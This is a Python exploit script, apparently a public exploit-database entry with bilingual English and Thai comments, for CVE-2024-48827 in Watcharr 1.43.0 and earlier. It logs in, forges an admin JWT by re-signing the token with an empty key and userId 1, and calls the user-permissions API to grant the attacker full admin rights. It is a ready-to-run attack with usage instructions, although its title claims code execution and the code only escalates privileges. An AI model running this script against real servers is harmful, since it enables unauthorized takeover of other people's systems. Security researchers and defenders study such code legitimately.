# Exploit Title : Watcharr 1.43.0 - Remote Code Execution (RCE) # CVE-2024-48827 exploit by Suphawith Phusanbai # Affected Watcharr version 1.43.0 and below. import argparse import requests import json import jwt from pyfiglet import Figlet f = Figlet(font='slant',width=100) print(f.renderText('CVE-2024-48827')) #store JWT token and UserID \ เก็บ token กับ UserID jwt_token = None user_id = None #login to obtain JWT token / ล็อคอินเพื่อรับ JWT Token def login(host, port, username, password): url = f'http://{host}:{port}/api/auth/' #payload in login API request \ payload ใน json payload = { 'username': username, 'password': password } headers = { 'Content-Type': 'application/json' } #login to obtain JWT token \ ล็อคอินเพิ่อเก็บ JWT token แล้วใส่ใน jwt_token object try: response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200: token = response.json().get('token') if token: print(f"[+] SUCCESS! JWT Token: {token}") global jwt_token jwt_token = token #decode JWT token and store UserID in UserID object \ ดีโค้ด JWT token แล้วเก็บค่า UserID ใส่ใน UserID object decoded_payload = jwt.decode(token, options={"verify_signature": False}) global user_id user_id = decoded_payload.get('userId') return token else: print("[-] Check your password again!") else: print(f"[-] Failed :(") print(f"Response: {response.text}") except Exception as e: print(f"Error! HTTP response code: {e}") #craft the admin token(to make this work you need to know admin username) \ สร้าง admin JWT token ขึ้นมาใหม่โดยใช้ token ที่ล็อคอิน def create_new_jwt(original_token): try: decoded_payload = jwt.decode(original_token, options={"verify_signature": False}) #userID = 1 is always the admin \ userID ลำดับที่ 1 คือ admin เสมอ decoded_payload['userId'] = 1 new_token = jwt.encode(decoded_payload, '', algorithm='HS256') print(f"[+] New JWT Token: {new_token}") return new_token except Exception as e: print(f"[-] Failed to create new JWT: {e}") #privilege escalation with the crafted JWT token \ PE โดยการใช้ crafted admin token def privilege_escalation(host, port, adminuser, token): #specify API endpoint for giving users admin role \ เรียกใช้งาน API สำหรับให้สิทธิ์ user admin url = f'http://{host}:{port}/api/server/users/{user_id}' # permission 3 givefull access privs you can also use 6 and 9 to gain partial admin privileges. \ ให้สิทธิ์ admin ทั้งหมดด้วย permission = 3 payload = { "permissions": 3 } headers = { 'Authorization': f'{token}', 'Content-Type': 'application/json' } try: response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200: print(f"[+] Privilege Escalation Successful! The current user is now an admin!") else: print(f"[-] Failed to escalate privileges. Response: {response.text}") except Exception as e: print(f"Error during privilege escalation: {e}") #exampl usage: python3 CVE-2024-48827.py -u dummy -p dummy -host 172.22.123.13 -port 3080 -adminuser admin #usage if __name__ == "__main__": parser = argparse.ArgumentParser(description='Exploit CVE-2024-48827 to obtain JWT token and escalate privileges.') parser.add_argument('-host', '--host', type=str, help='Host or IP address', required=True) parser.add_argument('-port', '--port', type=int, help='Port', required=True, default=3080) parser.add_argument('-u', '--username', type=str, help='Username for login', required=True) parser.add_argument('-p', '--password', type=str, help='Password for login', required=True) parser.add_argument('-adminuser', '--adminuser', type=str, help='Admin username to escalate privileges', required=True) args = parser.parse_args() #step 1: login token = login(args.host, args.port, args.username, args.password) #step 2: craft the admin token if token: new_token = create_new_jwt(token) #step 3: Escalate privileges with crafted token. Enjoy! if new_token: privilege_escalation(args.host, args.port, args.adminuser, new_token)